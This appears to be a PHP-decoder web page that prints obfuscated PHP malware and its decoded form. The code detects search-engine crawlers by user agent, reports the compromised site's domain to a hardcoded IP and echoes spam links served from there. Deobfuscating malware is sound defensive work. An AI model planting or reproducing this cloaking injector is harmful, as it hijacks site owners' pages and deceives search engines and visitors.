Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
goto AmA4J;AmA4J: ob_implicit_flush(true); goto aPM3W; gJ4nV: $botbotbotbot = "\x2e\56\56"..
Decoded Output download
<? goto AmA4J;AmA4J: ob_implicit_flush(true); goto aPM3W; gJ4nV: $botbotbotbot = "..." . $_SERVER["HTTP_USER_AGENT"]; goto c5MR6; c5MR6: $botbotbotbot = str_replace(" ", "-", $botbotbotbot); goto BdrbW; AUksH: error_reporting(0); goto gJ4nV; BdrbW: if (strpos($botbotbotbot, "oogle") or strpos($botbotbotbot, "ing") or strpos($botbotbotbot, "ahoo")) { $xxx = base64_decode("NQ=="); $xxx1 = base64_decode("NjE="); $xxx2 = base64_decode("NTg="); $xxx3 = base64_decode("MTU="); $xxx4 = base64_decode("aW5wdXQ="); $xxx0 = base64_decode("aHR0cDovLw=="); $xxx00 = $xxx . "." . $xxx1 . "." . $xxx2 . "." . $xxx3; $xxx11 = $xxx4 . "/?useragent=" . $botbotbotbot . "&domain=" . $_SERVER["HTTP_HOST"]; $url = $xxx0 . $xxx00 . "/" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "href=") < 1) { $result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "href=") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr} ({$errno})<br />\xa"; } else { $req = "/" . $xxx11; $out = "GET {$req} HTTP/1.0\xd\xa"; $out .= "Host: {$url}
\xa"; $out .= "Connection: Close\xd
\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("
", $text); $text = $text[7]; echo $text; } } goto fhxbC; aPM3W: ob_end_flush(); goto AUksH; fhxbC: ?>
Did this file decode correctly?
Original Code
goto AmA4J;AmA4J: ob_implicit_flush(true); goto aPM3W; gJ4nV: $botbotbotbot = "\x2e\56\56" . $_SERVER["\x48\124\x54\x50\137\125\123\x45\122\x5f\x41\107\x45\x4e\x54"]; goto c5MR6; c5MR6: $botbotbotbot = str_replace("\40", "\55", $botbotbotbot); goto BdrbW; AUksH: error_reporting(0); goto gJ4nV; BdrbW: if (strpos($botbotbotbot, "\x6f\x6f\147\x6c\x65") or strpos($botbotbotbot, "\151\156\147") or strpos($botbotbotbot, "\x61\x68\x6f\157")) { $xxx = base64_decode("\x4e\x51\75\x3d"); $xxx1 = base64_decode("\116\152\x45\75"); $xxx2 = base64_decode("\116\x54\x67\75"); $xxx3 = base64_decode("\x4d\x54\125\75"); $xxx4 = base64_decode("\141\127\65\167\144\130\121\x3d"); $xxx0 = base64_decode("\x61\110\122\x30\143\104\157\x76\114\x77\75\75"); $xxx00 = $xxx . "\56" . $xxx1 . "\56" . $xxx2 . "\x2e" . $xxx3; $xxx11 = $xxx4 . "\x2f\x3f\x75\163\x65\162\141\147\x65\x6e\x74\x3d" . $botbotbotbot . "\46\144\x6f\x6d\141\151\156\75" . $_SERVER["\110\x54\x54\x50\137\110\x4f\x53\124"]; $url = $xxx0 . $xxx00 . "\57" . $xxx11; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); curl_close($ch); echo $result; if (strpos($result, "\x68\x72\x65\146\75") < 1) { $result = file_get_contents("{$url}"); echo $result; } if (strpos($result, "\150\x72\145\x66\x3d") < 1) { $url = $xxx00; $fp = fsockopen($url, 80, $errno, $errstr, 30); if (!$fp) { echo "{$errstr}\40\50{$errno}\x29\x3c\x62\162\40\57\x3e\xa"; } else { $req = "\x2f" . $xxx11; $out = "\x47\x45\124\40{$req}\x20\x48\x54\124\120\57\61\56\60\xd\xa"; $out .= "\110\157\x73\164\x3a\40{$url}\15\xa"; $out .= "\103\157\x6e\156\145\x63\x74\x69\x6f\156\72\40\103\x6c\157\x73\145\xd\12\15\xa"; fwrite($fp, $out); while (!feof($fp)) { $text = $text . fgets($fp, 2048); } fclose($fp); } fclose($out); $text = explode("\12", $text); $text = $text[7]; echo $text; } } goto fhxbC; aPM3W: ob_end_flush(); goto AUksH; fhxbC:
Function Calls
None |
Stats
MD5 | e2019fc240f544d3008a3abec33a4437 |
Eval Count | 0 |
Decode Time | 49 ms |